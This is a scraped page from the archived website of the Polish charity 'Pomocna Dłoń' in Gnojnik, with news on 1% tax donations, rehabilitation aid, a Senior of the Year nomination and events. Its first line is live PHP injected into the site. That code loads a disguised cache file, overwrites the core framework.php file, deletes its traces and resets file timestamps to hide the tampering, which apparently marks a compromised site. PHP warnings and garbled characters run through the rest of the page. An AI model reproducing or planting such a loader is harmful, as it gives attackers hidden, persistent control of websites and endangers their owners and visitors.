$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
1 % TWOJEGO PODATKU

1%   TWOJEGO  PODATKU

Przekaż 1% TWOJEGO PODATKU

STOWARZYSZENIE NA RZECZ POMOCY
POTRZEBUJĄCYM I ZAPOBIEGANIA
PATOLOGIOM SPOŁECZNYM
„POMOCNA DŁOŃ”

Ty też możesz wspomóc rehabilitację ofiar wypadków komunikacyjnych, 

chorych na stwardnienie rozsiane i osoby

niepełnosprawne,potrzebujące, dzieci oraz uczestników Warsztatu Terapii 

Zajęciowej w Zawadzie Uszewskiej

Przekazując 1 % podatku na rzecz  naszej organizacji

STOWARZYSZENIE POMOCNA DŁOŃ W GNOJNIKU. 

Nr KRS  0000030427

Za przekazane pieniądze serdecznie  dziękujemy.

Interaktywny druk PIT-37, uzupełniony o nr KRS naszej organizacji 

można pobrać TUTAJ

Lub klikając w baner poniżej skożystać z dedykowanej aplikacji

Przed przystąpieniem do uzupełniania interaktywnego formularza

należy zainstalować wtyczkę 

pochodzącą ze strony www.e-deklaracje.gov.pl 

(link dostępny TUTAJ)

Do wypełnienia formularza potrzeby jest program Adobe Reader,

więcej na ten temat można przeczytać TUTAJ

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Pani Barbara Strzesak wśród nominowanych do tytułu SENIORA ROKU

IMG2Regionalny Ośrodek Polityki Społecznej w Krakowie już po raz szósty organizował Małopolski Plebiscyt „Poza Stereotypem-Senior roku 2011.” Patronat honorowy nad tegorocznym Plebiscytem objęli Władysław Kosiniak – Kamysz Minister Pracy i Polityki Społecznej oraz Marek Sowa Marszałek Województwa Małopolskiego.

Tytuł „POZA STEREOTYPEM - Senior Roku 2011” mogła  otrzymać osoba, która będąc w wieku emerytalnym (minimalny wiek kandydata - 55 lat) i nieaktywną zawodowo: jest liderem społeczności lokalnej, aktywnie działa w organizacji pozarządowej, klubie seniora, uniwersytecie trzeciego wieku, grupie nieformalnej itp. ,bezinteresownie angażuje się w pomoc innym .

Nominację do tytułu "Senior Roku 2011" w VI Małopolskim Plebiscycie "Poza Stereotypem Senior Roku 2011" otrzymała Pani Barbara Strzesak –Przewodnicząca Klubu Seniora” Wrzos” , poetka ludowa z Gnojnika. Kandydaturę Pani Basi zgłosiło Stowarzyszenie „Pomocna Dłoń „ z Gnojnika. Stowarzyszenie poparło  kandydaturę Pani Basi  ,biorąc pod uwagę jej zaangażowanie w prace Stowarzyszenia i Klubu Seniora „WRZOS”

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
„ MIKOŁAJ W GALERII „

P1080998Niebywałą niespodziankę dla młodszych dzieci z Gnojnika przygotowało Stowarzyszenie „ Pomocna Dłoń”. Zorganizowano wyjazd grupy ponad 20 dzieci  do Galerii Kazimierz w Krakowie na spotkanie ze Świętym Mikołajem.

W Galerii Kazimierz w dniu 8 grudnia (sobota) odbył się event Mikołajkowy. Godz. 12.00 – 19.00, event dostępny był  dla wszystkich klientów galerii. Koordynator ds. Marketingu Galerii Kazimierz Pani Katarzyna Bałuszek- Ignatowicz zaproponowała   Prezes Stowarzyszenia Ewie Cierniak-Lambert zorganizowanie wspólnie spotkania z Mikołajem dla dzieci z Gnojnika.

Pani Prezes tą  informacją podzieliła się z Dyrekcją Szkoły Podstawowej w Gnojniku. Dzieci pisały listy do Świętego Mikołaja. Pisały o czym marzą, co by je najbardziej ucieszyło. Pragnienia i życzenia  były przeróżne od słodyczy, ubiorów, poprzez zabawki a nawet prośby o prezenty dla rodzeństwa.
Św. Mikołaj starał się marzenia spełnić prawie w 100%.W upragnioną sobotę , dzieci punktualnie zebrały się przed Ośrodkiem Rehabilitacji  w Gnojniku ,gdzie czekał autokar i Panie opiekunki. Wszyscy z wielkim entuzjazmem jechali na spotkanie z Mikołajem.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Podziękowanie

Serdecznie dziękujemy za pomoc jaką okazali Państwo naszemu Stowarzyszeniu podczas rozbudowy Warsztatu Terapii Zajęciowej w Zawadzie Uszewskiej.

Dziękujemy wszystkim , którzy pomagali nam przekazując wpłaty pieniężne  tytułem celowych darowizn  na rozbudowę , dziękujemy za wpłaty z tytułu 1% podatku dochodowego.

Składamy podziękowania Firmom ,które przekazały nieodpłatnie materiały budowlane i wykończeniowe , wreszcie dziękujemy tym z Państwa , którzy pomagali nam swoją pracą bezpłatnie lub za symboliczną opłatą.

Szanowni Państwo !

Dokonaliśmy wspólnie wiele. Udowodniliśmy kolejny raz jak dużo można zrobić dobrego wspólnymi siłami. Państwa zaangażowanie pozwoliło nam dokończyć rozbudowę Warsztatu Terapii Zajęciowej w Zawadzie Uszewskiej. Możemy teraz wspólnie z naszymi uczestnikami i ich rodzicami cieszyć się pięknym obiektem. Rozbudowa obiektu pozwoliła nam powiększyć ilość uczestników do 50 osób.

SERDECZNIE DZIĘKUJEMY : Zarząd Stowarzyszenia , kierownik i pracownicy WTZ wraz z uczestnikami.

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Pomoc osobom poszkodowanym w wypadkach komunikacyjnych

Nadal pomagamy ofiarom wypadków komunikacyjnych i ich rodzinom. W miarę posiadanych środków refundujemy koszty zakupionego sprzętu rehabilitacyjnego, rehabilitację w różnych ośrodkach rehabilitacyjnych oraz rehabilitację w domu pacjentów . Ściśle współpracujemy z Ośrodkiem Rehabilitacji  w Gnojniku. Zatrudnieni w Ośrodku Rehabilitacyjno-Wypoczynkowym” EWA” fizjoterapeuci dojeżdżają do domu pacjentów w promieniu 50 km  i świadczą zabiegi w ramach rehabilitacji domowej. Zabiegi wykonywane są nieodpłatnie lub tylko  z opłatą za dojazd magistrów fizjoterapii. Obecnie koszty rehabilitacji poszkodowanych w wypadkach komunikacyjnych pokrywamy z wpłat celowych sponsorów oraz z pieniędzy otrzymanych z 1% podatku dochodowego.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Nową inicjatywą Stowarzyszenia jest pomoc w rehabilitacji osób chorych na STWARDNIENIE ROZSIANE

Stwardnienie rozsiane jest przewlekłą, postępującą chorobą, w wyniku której dochodzi do procesów degeneracyjnych w obrębie ośrodkowego układu nerwowego. W efekcie tego procesu pojawiają się zaburzenia w przekazywaniu informacji, co z kolei jest przyczyną objawów neurologicznych. W związku z faktem, iż ogniska demielinizacji są rozproszone oraz pojawiają się w mózgowiu i rdzeniu przedłużonym w różnym czasie, często używa się określenia, że SR jest rozsiane w czasie i przestrzeni”. Choroba może przebiegać w różnorodny sposób. Przebieg łagodny(tzw. nawracająco-postępujący-, 85% pacjentów)charakteryzuje się małą liczbą rzutów w ciągu całego życia pacjenta, nie doprowadza do znacznego ograniczenia sprawności. Z biegiem czasu jednak może zmienić się w typ powoli postępujący, nazywany również wtórnie postępującym. Często spotyka się przypadki pierwotnie postępującego stwardnienia rozsianego- 15% pacjentów prowadzącego w krótkim okresie czasu do znacznego ograniczenia sprawności .Coraz częściej chorują młodzi ludzie , w pełni aktywności zawodowej , a nawet nastolatkowie.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Spotkanie opłatkowe 21grudnia 2012

IMG 2709Okazja była niebywała , ponieważ w trakcie Spotkania Opłatkowego poświęcono i oddano do użytku rozbudowaną część nową obiektu WTZ. W spotkaniu uczestniczyli radna Sejmiku Wojewódzkiego Pani Józefa Szczurek –Żelazko, Starosta Brzeski Andrzej Potępa , Wice- Starosta Ryszard Ożóg , Dyrektor Powiatowego Centrum Pomocy Rodzinie Stanisław Lambert wraz ze swoją zastępczynią Magdą Twaróg, Przewodniczący Rady Gminy Ryszard Machał, wójt Sławomir Paterek, radna Gminy Krystyna Jaroszek , sołtys Zawady Uszewskiej Ryszard Robak oraz inni zaproszeni goście i rodzice podopiecznych WTZ.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
POMOC NAJUBOŻSZYM

Paczki 1Od samego początku założenia stowarzyszenia pomocą otaczaliśmy osoby niepełnosprawne , ubogie, bezrobotne i rodziny wielodzietne i gorzej sytuowane materialnie. Pomoc ta świadczona jest m.in. poprzez :

A / realizację zadań zlecanych przez Wojewodę Małopolskiego w zakresie programu „Bezdomność i zapobieganie bezdomności”

Program był realizowany na terenie powiatu brzeskiego w gminach: Gnojnik, Czchów, Iwkowa, Borzęcin.

  • W roku 2003 pomocą zostało objętych 50 rodzin w sumie 219 osób z terenu gminy Gnojnik
  • W roku 2004 pomocą zostało objętych 104 rodziny w sumie 390 osób z terenu gmin Gnojnik, Iwkowa, Czchów, Brzesko,
  • W roku 2005 pomocą zostało objętych 108 rodzin w sumie 503 osoby z terenu gmin Gnojnik, Iwkowa, Borzęcin, Czchów, Brzesko, Szczurowa, Dębno, Bochnia
  • W roku 2006 pomocą zostało objętych 102 rodziny w tym 495 osób z terenu gmin Gnojnik, Borzęcin, Iwkowa, Czchów.
Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
POMOC OFIAROM WYPADKÓW KOMUNIKACYJNYCH

P1050688Od 2003 roku Stowarzyszenie pomaga osobom poszkodowanym w wypadkach komunikacyjnych i ich rodzinom.

Pomocy udzielamy osobom z terenu całej Polski .Poszkodowani lub ich rodziny sami zwracają się do nas z prośbą o wsparcie . .Ponadto niejednokrotnie sami staramy się docierać z pomocą do osób poszkodowanych w wypadkach , o których dowiadujemy się z telewizji czy gazet. Wśród tych , którym pomogliśmy są mieszkańcy z różnych stron Polski od Sopotu, Gdańska , Łodzi , Zgierza, Nowego i Starego Sącza ,Bochni, Tarnowa , Bielska-Białej , Nowego Targu, Krakowa i Brzeska oraz wielu   mniejszych miejscowości .

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
10-cio lecie działalności Stowarzyszenie Pomocna Dłoń z Gnojnika

IMG 1177W ostatnią niedzielę lipca 2012 roku w parku w Gnojniku odbyła się piękna impreza . Stowarzyszenie Pomocna Dłoń z Gnojnika świętowało 10-cio lecie swojej działalności.

Stowarzyszenie Pomocna Dłoń powstało w 2001 roku z inicjatywy Stanisława Lamberta.

Od tego czasu wrosło w pejzaż gminy Gnojnik i powiatu brzeskiego, województwa małopolskiego.

Podejmowane różne działania skierowane są do różnych grup społecznych :dzieci osób starszych i niepełnosprawnych, uboższych rodzin, wielodzietnych , ofiar wypadków komunikacyjnych ,osób będących w potrzebie...Od 2002 roku podjęto współpracę z Bankiem Żywności. Za pośrednictwem Stowarzyszenia do uboższej części rodzin trafiło ponad 110 ton żywności głównie z gminy Gnojnik, Czchów i Iwkowej. Dużą popularnością cieszyły się „Zielone Ochronki „ półkolonie dla dzieci z gorzej sytuowanych rodzin. Przez kilka lat z tej formy wakacyjnego wypoczynku skorzystało ponad 2750 dzieci z 4 powiatów województwa małopolskiego. Wówczas gdy większość dzieci nie miało zapewnionego wypoczynku letniego Stowarzyszenie wystąpiło z taką inicjatywą oferując ciekawe zajęcia świetlicowe, , wycieczki plenerowe i autokarowe , wyjazdy na basen, spotkania z psychologiem, dobry posiłek...Na zakończenie każdych wakacji organizowano słynne plenerowe imprezy „Pomocna Dłoń i Zielone Ochronki żegnają wakacje”.

Więcej…
 
<< pierwsza < poprzednia 1 2 3 4 następna > ostatnia >>

Strona 1 z 4
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"